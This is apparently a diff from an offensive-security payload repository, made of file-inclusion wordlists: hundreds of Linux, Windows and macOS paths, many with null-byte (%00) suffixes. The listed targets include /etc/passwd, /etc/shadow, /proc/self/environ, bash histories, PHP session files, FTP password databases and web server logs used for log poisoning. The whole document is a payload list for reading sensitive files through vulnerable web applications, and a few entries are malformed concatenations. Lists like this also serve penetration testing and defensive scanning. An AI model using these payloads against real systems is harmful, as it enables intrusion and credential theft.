/logs/pure-ftpd.log%00
\mysql\bin\my.ini
/NetServer\bin\stable\apache\php.ini
/NetServer\bin\stable\apache\php.ini
/NetServer\bin\stable\apache\php.ini%00
/opt/apache2/conf/httpd.conf
/opt/apache2/conf/httpd.conf
/opt/apache2/conf/httpd.conf%00
/opt/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf%00
/opt/lampp/logs/access_log
/opt/lampp/logs/access_log
/opt/lampp/logs/access.log
/opt/lampp/logs/access.log
/opt/lampp/logs/access_log%00
/opt/lampp/logs/access.log%00
/opt/lampp/logs/error_log
/opt/lampp/logs/error_log
/opt/lampp/logs/error.log
/opt/lampp/logs/error.log
/opt/lampp/logs/error_log%00
/opt/lampp/logs/error.log%00
/opt/xampp/etc/php.ini
/opt/xampp/etc/php.ini
/opt/xampp/etc/php.ini%00
/opt/xampp/logs/access_log
/opt/xampp/logs/access_log
/opt/xampp/logs/access.log
/opt/xampp/logs/access.log
\opt\xampp\logs\access_log
\opt\xampp\logs\access.log
/opt/xampp/logs/access_log%00
/opt/xampp/logs/access.log%00
/opt/xampp/logs/error_log
/opt/xampp/logs/error_log
/opt/xampp/logs/error.log
/opt/xampp/logs/error.log
\opt\xampp\logs\error_log
\opt\xampp\logs\error.log
/opt/xampp/logs/error_log%00
/opt/xampp/logs/error.log%00
/php4\php.ini
/php4\php.ini
/php4\php.ini%00
/php5\php.ini
/php5\php.ini
/php5\php.ini%00
php://input
/php\php.ini
/php\php.ini
/PHP\php.ini
/PHP\php.ini
/php\php.ini%00
/PHP\php.ini%00
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf%00
/private/etc/httpd/httpd.conf.default
/private/etc/httpd/httpd.conf.default
/private/etc/httpd/httpd.conf.default%00
/proc/cmdline
/proc/self/cmdline
/proc/self/environ
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/10
/proc/self/fd/11
/proc/self/fd/12
/proc/self/fd/13
/proc/self/fd/14
/proc/self/fd/15
/proc/self/fd/16
/proc/self/fd/17
/proc/self/fd/18
/proc/self/fd/19
/proc/self/fd/2
/proc/self/fd/20
/proc/self/fd/21
/proc/self/fd/22
/proc/self/fd/23
/proc/self/fd/24
/proc/self/fd/25
/proc/self/fd/255
/proc/self/fd/26
/proc/self/fd/27
/proc/self/fd/28
/proc/self/fd/29
/proc/self/fd/3
/proc/self/fd/30
/proc/self/fd/31
/proc/self/fd/32
/proc/self/fd/33
/proc/self/fd/34
/proc/self/fd/35/etc/passwd%00
/proc/self/fd/4
/proc/self/fd/5
/proc/self/fd/6
/proc/self/fd/7
/proc/self/fd/8
/proc/self/fd/9
/proc/self/stat
/proc/self/status
/proc/version
/Program Files\Apache Group\Apache2\conf\httpd.conf
/Program Files\Apache Group\Apache2\conf\httpd.conf
\Program Files\Apache Group\Apache2\conf\httpd.conf
/Program Files\Apache Group\Apache2\conf\httpd.conf%00
/Program Files\Apache Group\Apache\conf\httpd.conf
/Program Files\Apache Group\Apache\conf\httpd.conf
\Program Files\Apache Group\Apache\conf\httpd.conf
/Program Files\Apache Group\Apache\conf\httpd.conf%00
/Program Files\Apache Group\Apache\logs\access.log
/Program Files\Apache Group\Apache\logs\access.log
\Program Files\Apache Group\Apache\logs\access.log
/Program Files\Apache Group\Apache\logs\access.log%00
/Program Files\Apache Group\Apache\logs\error.log
/Program Files\Apache Group\Apache\logs\error.log
\Program Files\Apache Group\Apache\logs\error.log
/Program Files\Apache Group\Apache\logs\error.log%00
/Program Files\xampp\apache\conf\httpd.conf
/Program Files\xampp\apache\conf\httpd.conf
/Program Files\xampp\apache\conf\httpd.conf%00
\Program Files\xampp\apache\conf\httpd.confetc/passwd
/root/.bash_history
/tmp/sess_<sessid>
/usr/apache2/conf/httpd.conf
/usr/apache2/conf/httpd.conf
/usr/apache2/conf/httpd.conf%00
/usr/apache/conf/httpd.conf
/usr/apache/conf/httpd.conf
/usr/apache/conf/httpd.conf%00
/usr/etc/pure-ftpd.conf
/usr/etc/pure-ftpd.conf
/usr/etc/pure-ftpd.conf%00
/usr/lib/php.ini
/usr/lib/php.ini
/usr/lib/php.ini%00
/usr/lib/php/php.ini
/usr/lib/php/php.ini
/usr/lib/php/php.ini%00
/usr/lib/security/mkuser.default
/usr/lib/security/mkuser.default
/usr/lib/security/mkuser.default%00
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf%00
/usr/local/apache2/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apache2/httpd.conf%00
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/access_log%00
/usr/local/apache2/logs/access.log%00
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/error.log
/usr/local/apache2/logs/error.log
/usr/local/apache2/logs/error_log%00
/usr/local/apache2/logs/error.log%00
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/httpd.conf%00
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/php.ini%00
/usr/local/apache/httpd.conf
/usr/local/apache/httpd.conf
/usr/local/apache/httpd.conf%00
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_ log%00
/usr/local/apache/logs/access_log%00
/usr/local/apache/logs/access. log%00
/usr/local/apache/logs/access.log%00
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log%00
/usr/local/apache/logs/error.log%00
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf%00
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache/conf/httpd.conf%00
/usr/local/cpanel/logs
/usr/local/cpanel/logs
/usr/local/cpanel/logs%00
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/access_log%00
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/error_log%00
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/license_log%00
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/login_log%00
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/stats_log%00
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/apache2/conf/httpd.conf%00
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf%00
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/apache/vhosts.conf%00
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf%00
/usr/local/etc/php.ini
/usr/local/etc/php.ini
/usr/local/etc/php.ini%00
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pure-ftpd.conf%00
/usr/local/etc/pureftpd.pdb
/usr/local/etc/pureftpd.pdb
/usr/local/etc/pureftpd.pdb%00
/usr/local/httpd/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf%00
/usr/local/lib/php.ini
/usr/local/lib/php.ini
/usr/local/lib/php.ini%00
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf%00
/usr/local/php4/httpd.conf.php
/usr/local/php4/httpd.conf.php
/usr/local/php4/httpd.conf.php%00
/usr/local/php4/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/lib/php.ini%00
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf%00
/usr/local/php5/httpd.conf.php
/usr/local/php5/httpd.conf.php
/usr/local/php5/httpd.conf.php%00
/usr/local/php5/lib/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/lib/php.ini%00
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf%00
/usr/local/php/httpd.conf.php
/usr/local/php/httpd.conf.php
/usr/local/php/httpd.conf.php%00
/usr/local/php/lib/php.ini
/usr/local/php/lib/php.ini
/usr/local/php/lib/php.ini%00
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pure-ftpd.conf%00
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/etc/pureftpd.pdb%00
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/pureftpd/sbin/pure-config.pl%00
/usr/local/Zend/etc/php.ini
/usr/local/Zend/etc/php.ini
/usr/local/Zend/etc/php.ini%00
/usr/pkgsrc/net/pureftpd/
/usr/pkgsrc/net/pureftpd/
/usr/pkgsrc/net/pureftpd/%00
/usr/ports/contrib/pure-ftpd/
/usr/ports/contrib/pure-ftpd/
/usr/ports/contrib/pure-ftpd/%00
/usr/ports/ftp/pure-ftpd/
/usr/ports/ftp/pure-ftpd/
/usr/ports/ftp/pure-ftpd/%00
/usr/ports/net/pure-ftpd/
/usr/ports/net/pure-ftpd/
/usr/ports/net/pure-ftpd/%00
/usr/sbin/pure-config.pl
/usr/sbin/pure-config.pl
/usr/sbin/pure-config.pl%00
/var/adm/lastlog
/var/adm/log/xferlog
/var/adm/log/xferlog
/var/adm/log/xferlog%00
/var/adm/messages
/var/adm/messages.0
/var/adm/messages.1
/var/adm/messages.2
/var/adm/messages.3
/var/adm/utmpx
/var/adm/wtmpx
/var/cpanel/cpanel.config
/var/cpanel/cpanel.config
/var/cpanel/cpanel.config%00
/var/db/shadow/hash
/var/lib/mysql/my.cnf
/var/lib/mysql/my.cnf
/var/lib/mysql/my.cnf%00
/var/lib/php5/session/sess_<sessid>
/var/lib/php/session/sess_<sessid>
/var/local/www/conf/php.ini
/var/local/www/conf/php.ini
/var/local/www/conf/php.ini%00
/var/log/access_log
/var/log/access_log
/var/log/access_log
/var/log/access.log
/var/log/access.log
/var/log/access.log
/var/log/access_log%00
/var/log/access.log%00
/var/log/apache2/access_log
/var/log/apache2/access_log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/log/apache2/access.log
/var/log/apache2/access_log%00
/var/log/apache2/access.log%00
/var/log/apache2/error_log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/error.log
/var/log/apache2/error.log
/var/log/apache2/error_log%00
/var/log/apache2/error.log%00
/var/log/apache/access_log
/var/log/apache/access_log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache/access.log
/var/log/apache/access_log%00
/var/log/apache/access.log%00
/var/log/apache/error_log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/error.log
/var/log/apache/error.log
/var/log/apache/error_log%00
/var/log/apache/error.log%00
/var/log/authlog
/var/log/auth.log
/var/log/auth.log.0
/var/log/auth.log.0.gz
/var/log/auth.log.1
/var/log/auth.log.1.gz
/var/log/auth.log.2
/var/log/auth.log.2.gz
/var/log/auth.log.3
/var/log/auth.log.3.gz
/var/log/error_log
/var/log/error_log
/var/log/error.log
/var/log/error.log
/var/log/error_log%00
/var/log/error.log%00
/var/log/exim_mainlog
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim/mainlog
/var/log/exim_mainlog%00
/var/log/exim/mainlog%00
/var/log/exim_paniclog
/var/log/exim_paniclog
/var/log/exim/paniclog
/var/log/exim/paniclog
/var/log/exim_paniclog%00
/var/log/exim/paniclog%00
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/exim/rejectlog
/var/log/exim/rejectlog%00
/var/log/exim_rejectlog%00/etc/issue
/var/log/exim_rejectlog/etc/passwd
/var/log/ftplog
/var/log/ftplog
/var/log/ftplog%00
/var/log/ftp-proxy
/var/log/ftp-proxy
/var/log/ftp-proxy%00
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftp-proxy/ftp-proxy.log%00
/var/log/httpd/access_log
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/access_log%00
/var/log/httpd/access.log%00
/var/log/httpd/error_log
/var/log/httpd/error_log
/var/log/httpd/error.log
/var/log/httpd/error_log%00
/var/log/httpd/error.log%00
/var/log/kernel.log
/var/log/lastlog
/var/log/maillog
/var/log/mail.log
/var/log/maillog
/var/log/maillog%00
/var/log/messages
/var/log/messages.0
/var/log/messages.0.gz
/var/log/messages.1
/var/log/messages.1.gz
/var/log/messages.2
/var/log/messages.2.gz
/var/log/messages.3
/var/log/messages.3.gz
/var/log/messages.log
/var/log/mysqlderror.log
/var/log/mysqlderror.log
/var/log/mysqlderror.log%00
/var/log/mysql.log
/var/log/mysql.log
/var/log/mysql.log%00
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-bin.log%00
/var/log/mysql/mysql.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql.log%00
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql-slow.log%00
/var/log/nginx/access_log
/var/log/nginx/access_log
/var/log/nginx/access_log
/var/log/nginx/access.log
/var/log/nginx/access.log
/var/log/nginx/access_log%00
/var/log/nginx/access.log%00
/var/log/nginx/error_log
/var/log/nginx/error_log
/var/log/nginx/error.log
/var/log/nginx/error.log
/var/log/nginx/error.log
/var/log/nginx/error_log%00
/var/log/nginx/error.log%00
/var/log/proftpd
/var/log/proftpd
/var/log/proftpd%00
/var/log/pureftpd.log
/var/log/pureftpd.log
/var/log/pureftpd.log%00
/var/log/pure-ftpd/pure-ftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/pure-ftpd/pure-ftpd.log%00
/var/log/secure.log
/var/log/syslog
/var/log/syslog.0
/var/log/syslog.0.gz
/var/log/syslog.1
/var/log/syslog.1.gz
/var/log/syslog.2
/var/log/syslog.2.gz
/var/log/syslog.3
/var/log/syslog.3.gz
/var/log/syslog.log
/var/log/vsftpd.log
/var/log/vsftpd.log
/var/log/vsftpd.log%00
/var/log/wtmp
/var/log/xferlog
/var/log/xferlog
/var/log/xferlog%00
/var/mail/apache
/var/mail/nobody
/var/mail/www
/var/mail/www-data
/var/mysql.log
/var/mysql.log
/var/mysql.log%00
/var/root/.bash_history
/var/root/.sh_history
/var/run/utmp
/var/www/.bash_history
/var/www/conf/httpd.conf
/var/www/conf/httpd.conf
/var/www/conf/httpd.conf%00
/var/www/config.php
/var/www/logs/access_log
/var/www/logs/access_log
/var/www/logs/access_log
/var/www/logs/access.log
/var/www/logs/access.log
/var/www/logs/access_log%00
/var/www/logs/access.log%00
/var/www/logs/error_log
/var/www/logs/error_log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/error.log
/var/www/logs/error.log
/var/www/logs/error_log%00
/var/www/logs/error.log%00
/var/www/mgr/logs/access_log
/var/www/mgr/logs/access.log
/var/www/mgr/logs/error_log
/var/www/mgr/logs/error.log
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf%00
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf%00
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf%00
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini%00
/Volumes/webBackup/opt/apache2/conf/httpd.conf
/Volumes/webBackup/opt/apache2/conf/httpd.conf
/Volumes/webBackup/opt/apache2/conf/httpd.conf%00
/Volumes/webBackup/private/etc/httpd/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf%00
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/Volumes/webBackup/private/etc/httpd/httpd.conf.default%00
/web/conf/php.ini
/web/conf/php.ini
/web/conf/php.ini%00
/WINDOWS\php.ini
/WINDOWS\php.ini
/WINDOWS\php.ini%00
/WINNT\php.ini
/WINNT\php.ini
/WINNT\php.ini%00
/www/logs/proftpd.system.log
/www/logs/proftpd.system.log
/www/logs/proftpd.system.log%00
/xampp\apache\bin\php.ini
/xampp\apache\bin\php.ini
/xampp\apache\bin\php.ini%00
\xampp\apache\conf\httpd.conf
\xampp\apache\logs\access.log
\xampp\apache\logs\error.log
\xampp\FileZillaFTP\FileZilla Server.xml
\xampp\FileZillaFTP\Logs
\xampp\FileZillaFTP\Logs\access.log
\xampp\FileZillaFTP\Logs\error.log
\xampp\MercuryMail\LOGS\access.log
\xampp\MercuryMail\LOGS\error.log
\xampp\MercuryMail\mercury.ini
\xampp\mysql\data\mysql.err
\xampp\phpmyadmin\config.inc
\xampp\phpMyAdmin\config.inc
\xampp\phpmyadmin\config.inc.php
\xampp\phpMyAdmin\config.inc.php
\xampp\phpmyadmin\phpinfo.php
\xampp\phpMyAdmin\phpinfo.php
\xampp\php\php.ini
\xampp\sendmail\sendmail.ini
\xampp\sendmail\sendmail.log
\xampp\tomcat\conf\tomcat-users.xml
\xampp\tomcat\conf\web.xml
\xampp\webalizer\webalizer.conf
\xampp\webdav\webdav.txt

319
File Inclusion/Intruders/List_Of_File_To_Include_NullByteAdded.txt Normal file
View File

@ -0,0 +1,319 @@
/etc/passwd%00
/etc/passwd%00
/etc/shadow%00
/etc/group%00
/etc/security/group%00
/etc/security/passwd%00
/etc/security/user%00
/etc/security/environ%00
/etc/security/limits%00
/usr/lib/security/mkuser.default%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/etc/httpd/logs/acces_log%00
/etc/httpd/logs/acces.log%00
/etc/httpd/logs/error_log%00
/etc/httpd/logs/error.log%00
/var/www/logs/access_log%00
/var/www/logs/access.log%00
/usr/local/apache/logs/access_ log%00
/usr/local/apache/logs/access. log%00
/var/log/apache/access_log%00
/var/log/apache2/access_log%00
/var/log/apache/access.log%00
/var/log/apache2/access.log%00
/var/log/access_log%00
/var/log/access.log%00
/var/www/logs/error_log%00
/var/www/logs/error.log%00
/usr/local/apache/logs/error_log%00
/usr/local/apache/logs/error.log%00
/var/log/apache/error_log%00
/var/log/apache2/error_log%00
/var/log/apache/error.log%00
/var/log/apache2/error.log%00
/var/log/error_log%00
/var/log/error.log%00
/var/log/httpd/access_log%00
/var/log/httpd/error_log%00
/var/log/httpd/access_log%00
/var/log/httpd/error_log%00
/var/log/nginx/access_log%00
/var/log/nginx/access.log%00
/var/log/nginx/error_log%00
/var/log/nginx/error.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache2/logs/error.log%00
/apache2/logs/access.log%00
/apache2/logs/error.log%00
/apache2/logs/access.log%00
/apache2/logs/error.log%00
/apache2/logs/access.log%00
/apache2/logs/error.log%00
/apache2/logs/access.log%00
/apache2/logs/error.log%00
/apache2/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/etc/httpd/logs/acces_log%00
/etc/httpd/logs/acces.log%00
/etc/httpd/logs/error_log%00
/etc/httpd/logs/error.log%00
/usr/local/apache/logs/access_log%00
/usr/local/apache/logs/access.log%00
/usr/local/apache/logs/error_log%00
/usr/local/apache/logs/error.log%00
/usr/local/apache2/logs/access_log%00
/usr/local/apache2/logs/access.log%00
/usr/local/apache2/logs/error_log%00
/usr/local/apache2/logs/error.log%00
/var/www/logs/access_log%00
/var/www/logs/access.log%00
/var/www/logs/error_log%00
/var/www/logs/error.log%00
/var/log/httpd/access_log%00
/var/log/httpd/access.log%00
/var/log/httpd/error_log%00
/var/log/httpd/error.log%00
/var/log/apache/access_log%00
/var/log/apache/access.log%00
/var/log/apache/error_log%00
/var/log/apache/error.log%00
/var/log/apache2/access_log%00
/var/log/apache2/access.log%00
/var/log/apache2/error_log%00
/var/log/apache2/error.log%00
/var/log/access_log%00
/var/log/access.log%00
/var/log/error_log%00
/var/log/error.log%00
/opt/lampp/logs/access_log%00
/opt/lampp/logs/error_log%00
/opt/xampp/logs/access_log%00
/opt/xampp/logs/error_log%00
/opt/lampp/logs/access.log%00
/opt/lampp/logs/error.log%00
/opt/xampp/logs/access.log%00
/opt/xampp/logs/error.log%00
/Program Files\Apache Group\Apache\logs\access.log%00
/Program Files\Apache Group\Apache\logs\error.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/etc/httpd/logs/acces_log%00
/etc/httpd/logs/acces.log%00
/etc/httpd/logs/error_log%00
/etc/httpd/logs/error.log%00
/var/www/logs/access_log%00
/var/www/logs/access.log%00
/usr/local/apache/logs/access_log%00
/usr/local/apache/logs/access.log%00
/var/log/apache/access_log%00
/var/log/apache/access.log%00
/var/log/access_log%00
/var/www/logs/error_log%00
/var/www/logs/error.log%00
/usr/local/apache/logs/error_log%00
/usr/local/apache/logs/error.log%00
/var/log/apache/error_log%00
/var/log/apache/error.log%00
/var/log/access_log%00
/var/log/error_log%00
/usr/local/apache/conf/httpd.conf%00
/usr/local/apache2/conf/httpd.conf%00
/etc/httpd/conf/httpd.conf%00
/etc/apache/conf/httpd.conf%00
/usr/local/etc/apache/conf/httpd.conf%00
/etc/apache2/httpd.conf%00
/usr/local/apache/conf/httpd.conf%00
/usr/local/apache2/conf/httpd.conf%00
/usr/local/apache/httpd.conf%00
/usr/local/apache2/httpd.conf%00
/usr/local/httpd/conf/httpd.conf%00
/usr/local/etc/apache/conf/httpd.conf%00
/usr/local/etc/apache2/conf/httpd.conf%00
/usr/local/etc/httpd/conf/httpd.conf%00
/usr/apache2/conf/httpd.conf%00
/usr/apache/conf/httpd.conf%00
/usr/local/apps/apache2/conf/httpd.conf%00
/usr/local/apps/apache/conf/httpd.conf%00
/etc/apache/conf/httpd.conf%00
/etc/apache2/conf/httpd.conf%00
/etc/httpd/conf/httpd.conf%00
/etc/http/conf/httpd.conf%00
/etc/apache2/httpd.conf%00
/etc/httpd/httpd.conf%00
/etc/http/httpd.conf%00
/etc/httpd.conf%00
/opt/apache/conf/httpd.conf%00
/opt/apache2/conf/httpd.conf%00
/var/www/conf/httpd.conf%00
/private/etc/httpd/httpd.conf%00
/private/etc/httpd/httpd.conf.default%00
/Volumes/webBackup/opt/apache2/conf/httpd.conf%00
/Volumes/webBackup/private/etc/httpd/httpd.conf%00
/Volumes/webBackup/private/etc/httpd/httpd.conf.default%00
/Program Files\Apache Group\Apache\conf\httpd.conf%00
/Program Files\Apache Group\Apache2\conf\httpd.conf%00
/Program Files\xampp\apache\conf\httpd.conf%00
/usr/local/php/httpd.conf.php%00
/usr/local/php4/httpd.conf.php%00
/usr/local/php5/httpd.conf.php%00
/usr/local/php/httpd.conf%00
/usr/local/php4/httpd.conf%00
/usr/local/php5/httpd.conf%00
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf%00
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf%00
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf%00
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php%00
/usr/local/etc/apache/vhosts.conf%00
/etc/php.ini%00
/bin/php.ini%00
/etc/httpd/php.ini%00
/usr/lib/php.ini%00
/usr/lib/php/php.ini%00
/usr/local/etc/php.ini%00
/usr/local/lib/php.ini%00
/usr/local/php/lib/php.ini%00
/usr/local/php4/lib/php.ini%00
/usr/local/php5/lib/php.ini%00
/usr/local/apache/conf/php.ini%00
/etc/php4.4/fcgi/php.ini%00
/etc/php4/apache/php.ini%00
/etc/php4/apache2/php.ini%00
/etc/php5/apache/php.ini%00
/etc/php5/apache2/php.ini%00
/etc/php/php.ini%00
/etc/php/php4/php.ini%00
/etc/php/apache/php.ini%00
/etc/php/apache2/php.ini%00
/web/conf/php.ini%00
/usr/local/Zend/etc/php.ini%00
/opt/xampp/etc/php.ini%00
/var/local/www/conf/php.ini%00
/etc/php/cgi/php.ini%00
/etc/php4/cgi/php.ini%00
/etc/php5/cgi/php.ini%00
/php5\php.ini%00
/php4\php.ini%00
/php\php.ini%00
/PHP\php.ini%00
/WINDOWS\php.ini%00
/WINNT\php.ini%00
/apache\php\php.ini%00
/xampp\apache\bin\php.ini%00
/NetServer\bin\stable\apache\php.ini%00
/home2\bin\stable\apache\php.ini%00
/home\bin\stable\apache\php.ini%00
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini%00
/usr/local/cpanel/logs%00
/usr/local/cpanel/logs/stats_log%00
/usr/local/cpanel/logs/access_log%00
/usr/local/cpanel/logs/error_log%00
/usr/local/cpanel/logs/license_log%00
/usr/local/cpanel/logs/login_log%00
/usr/local/cpanel/logs/stats_log%00
/var/cpanel/cpanel.config%00
/var/log/mysql/mysql-bin.log%00
/var/log/mysql.log%00
/var/log/mysqlderror.log%00
/var/log/mysql/mysql.log%00
/var/log/mysql/mysql-slow.log%00
/var/mysql.log%00
/var/lib/mysql/my.cnf%00
/etc/mysql/my.cnf%00
/etc/my.cnf%00
/etc/logrotate.d/proftpd%00
/www/logs/proftpd.system.log%00
/var/log/proftpd%00
/etc/proftp.conf%00
/etc/protpd/proftpd.conf%00
/etc/vhcs2/proftpd/proftpd.conf%00
/etc/proftpd/modules.conf%00
/var/log/vsftpd.log%00
/etc/vsftpd.chroot_list%00
/etc/logrotate.d/vsftpd.log%00
/etc/vsftpd/vsftpd.conf%00
/etc/vsftpd.conf%00
/etc/chrootUsers%00
/var/log/xferlog%00
/var/adm/log/xferlog%00
/etc/wu-ftpd/ftpaccess%00
/etc/wu-ftpd/ftphosts%00
/etc/wu-ftpd/ftpusers%00
/usr/sbin/pure-config.pl%00
/usr/etc/pure-ftpd.conf%00
/etc/pure-ftpd/pure-ftpd.conf%00
/usr/local/etc/pure-ftpd.conf%00
/usr/local/etc/pureftpd.pdb%00
/usr/local/pureftpd/etc/pureftpd.pdb%00
/usr/local/pureftpd/sbin/pure-config.pl%00
/usr/local/pureftpd/etc/pure-ftpd.conf%00
/etc/pure-ftpd.conf%00
/etc/pure-ftpd/pure-ftpd.pdb%00
/etc/pureftpd.pdb%00
/etc/pureftpd.passwd%00
/etc/pure-ftpd/pureftpd.pdb%00
/usr/ports/ftp/pure-ftpd/%00
/usr/ports/net/pure-ftpd/%00
/usr/pkgsrc/net/pureftpd/%00
/usr/ports/contrib/pure-ftpd/%00
/var/log/pure-ftpd/pure-ftpd.log%00
/logs/pure-ftpd.log%00
/var/log/pureftpd.log%00
/var/log/ftp-proxy/ftp-proxy.log%00
/var/log/ftp-proxy%00
/var/log/ftplog%00
/etc/logrotate.d/ftp%00
/etc/ftpchroot%00
/etc/ftphosts%00
/var/log/exim_mainlog%00
/var/log/exim/mainlog%00
/var/log/maillog%00
/var/log/exim_paniclog%00
/var/log/exim/paniclog%00
/var/log/exim/rejectlog%00
/var/log/exim_rejectlog%00

8
File Inclusion/Intruders/Mac-files.txt Normal file
View File

@ -0,0 +1,8 @@
/etc/apache2/httpd.conf
/Library/WebServer/Documents/index.html
/private/var/log/appstore.log
/var/log/apache2/error_log
/var/log/apache2/access_log
